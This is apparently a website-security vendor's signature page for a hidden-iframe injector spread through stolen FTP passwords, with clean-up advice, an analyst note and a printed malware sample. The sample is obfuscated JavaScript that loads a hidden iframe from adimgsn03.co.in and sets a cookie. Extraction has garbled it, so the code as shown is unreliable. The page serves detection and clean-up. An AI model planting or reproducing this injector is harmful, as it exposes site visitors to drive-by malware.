SiteCheck Signatures


malware-entry-mwiframehd567

Description:

A hidden, malicious iframe was identified. This malware reaches a web site through a compromised desktop: a virus on the desktop steals any passwords stored in the FTP client and uses them to attack the site.
 
Note that every PHP, HTML and JS file gets compromised by this malware.

 
Affecting: Any web site with FTP enabled (and password stolen).

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this
virus is very good at hiding from the AV that is currently running. Once the desktop is clean, you
can clean up the sites and change the passwords. You can also sign up with us and let our team remove the malware for you.

 
Loads malware from multiple sources:


http://adimgsn03.co.in/smb
(and many other domains).

 

Malware dump (sample of malware):


// Analyst note (not part of the captured sample).
//
// Extraction damage: this listing is not the script as it was served. The backslashes
// of the "\xNN" string escapes and of the regex classes are missing ("ux73x65rid...",
// /MSIEs+/), every "." appears as the entity "&#46", and "*" operators appear to have
// been dropped ("k60601000", "parseInt(i9CCc[1])100"). Build signatures from the bytes
// found in the infected file, not from this rendering.
//
// What the visible code does:
//  - s8K9GnS is the entry point. It is registered for DOMContentLoaded, or, where
//    document.addEventListener is missing, through a deferred <script> written with
//    document.write whose onreadystatechange handler calls it.
//  - s8K9GnS returns early when the cookie named by `f` already equals `c` (IkfyC reads
//    document.cookie), or when an element with its marker id already exists. With the
//    escapes restored, that id reads as "tmp_div1".
//  - Otherwise it appends a DIV to document.body and assigns iframe markup to its
//    innerHTML. With the escapes restored, the markup reads as a 19x19 iframe with
//    frameborder=0 and scrolling='no', pointing at the adimgsn03.co.in host, whose
//    onload attribute calls UvPe.
//  - UvPe sets the DIV's style.visibility (the value reads as "hidden") and calls
//    Sk5Ht(f, c, 168); if that throws, it calls Sk5Ht(f, c, 24). Sk5Ht writes the cookie
//    with an expiry derived from its third argument - presumably hours, but the
//    arithmetic was lost in extraction, so confirm against the original.
//  - iyou1V, xHUh (an MSIE / Windows NT user-agent version check) and dCKehf are defined
//    but never called in this excerpt.
//
// NOTE(review): identifiers such as IkfyC and s8K9GnS look machine-generated and
// presumably differ between infections - confirm before keying detection on them.
f="ux73x65ridAx308x317x46Bx325";var c="25";var vLGtb=1;var AkIm1Qm;var idTq="hx74x74px3ax2fx2flocax6chosx74:7102x2f";function IkfyC(R_0wqMQ)
{var luCu0N=document.cookie;if(!luCu0N)
{return null;}luCu0N=luCu0N&#46replace(/s/g,"");var eQ2Ki=luCu0N&#46split(";");var i=0;for(i=0;i<eQ2Ki.length;i++){var Pa8CI=eQ2Ki[i]&#46split("=");if(Pa8CI[0]!=R_0wqMQ)
{continue;}return unescape(Pa8CI[1]);}return null;};function Sk5Ht(R_0wqMQ,R7prjG,k){var exp=new Date();var Uwe3iQB=exp&#46getTime()+
(k60601000);exp&#46setTime(Uwe3iQB);var v1tDww5=R_0wqMQ+"="+escape(R7prjG)+"x3b ex78x70iresx3d"+exp&#46toGMTString();document&#46cookie=v1tDww5;};function iyou1V()
{var lsnV=document&#46getElementById("ifr1");var IhT3RL=new Date();var hgJFg=IhT3RL&#46getTime();var dwdc_m=hgJFg-AkIm1Qm;if(dwdc_m<1000)
{document&#46location=idTq+escape("htx74p:x2fx2fx61dx69mgx73n03x2ex63o&#46in/x6bs");}else{AkIm1Qm=hgJFg;lsnV&#46src=idTq;}};function UvPe()
{try{var lfkcQ=document&#46getElementById("x74x6dp_dx69v1");lfkcQ&#46style&#46visibility="x68x69ddex6e";Sk5Ht(f,c,168);}catch(e){Sk5Ht(f,c,24);};};function xHUh(){var aE3Di=/MSIEs+
(d+)&#46(d+)/;var i9CCc=new Array;var VPxMI,yt9GCDK;i9CCc=aE3Di&#46exec(navigator&#46userAgent);if(!i9CCc){return false;}VPxMI=parseInt(i9CCc[1])100+parseInt(i9CCc[2]);if(VPxMI<700)
{return false;}aE3Di=/WindowssNTs(d)&#46(d)/;i9CCc=aE3Di&#46exec(navigator&#46userAgent);if(!i9CCc){return false;}yt9GCDK=parseInt(i9CCc[1])10+parseInt(i9CCc[2]);if(yt9GCDK<60)
{return false;}return true;};function s8K9GnS(){if(vLGtb){try{if(IkfyC(f)==c)
{return false;}}catch(e){};}try{var lfkcQ=document&#46getElementById("tmx70_x64x69v1");if(lfkcQ){return false;}}catch(e)
{};try{var lfkcQ=document&#46createElement("DIV");lfkcQ&#46id="x74mp_dix76x31";document&#46body&#46appendChild(lfkcQ);var d=0;if(navigator&#46userAgent&#46indexOf("MSIE")!= -1)
{try{d=g();function g(){return 0;}}catch(e){d=1;}}if(d==0){lfkcQ&#46innerHTML
="x3cx69framx65 x6fx6eload=x27x55x76Pex28x29;x27 
x73rcx3dx27hx74tx70x3ax2f/x61dx69x6dgsnx303&#46x63o&#46inx2fkx27 wx69dtx68=x31x39x20heighx74=x319 framebx6frdx65x72=x30 scrollix6egx3dx27nx6fx27>x3c/ix66rame>";}else{lfkcQ&#46innerHTML="<ix66x72amx65x20onx6cx6fad=x27x55vPe();x27 x73x72c=
x27httpx3ax2f/adimgsn0x33&#46cox2ex69nx2fx73mx62x27 wix64tx68=19x20heix67x68tx3d19 frax6dx65bx6frder=0x20x73cx72x6flx6cx69ng=x27x6eox27x3e<x2fx69frame>";return;}}catch(e){};};if(document&#46addEventListener){document&#46addEventListener("DOMCx6fx6etex6etLoax64x65x64",s8K9GnS,false);}else{document&#46write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'/script>');var script=document&#46getElementById("x5f_ix65_onx6cx6fad");script&#46onreadystatechange=function(){if(this&#46readyState=="cox6dx70x6cete"){s8K9GnS();}};}function dCKehf(str) 
{return str&#46replace(/[^x01-x7F]/g, "");}/ 1xnDzVVMAr6u */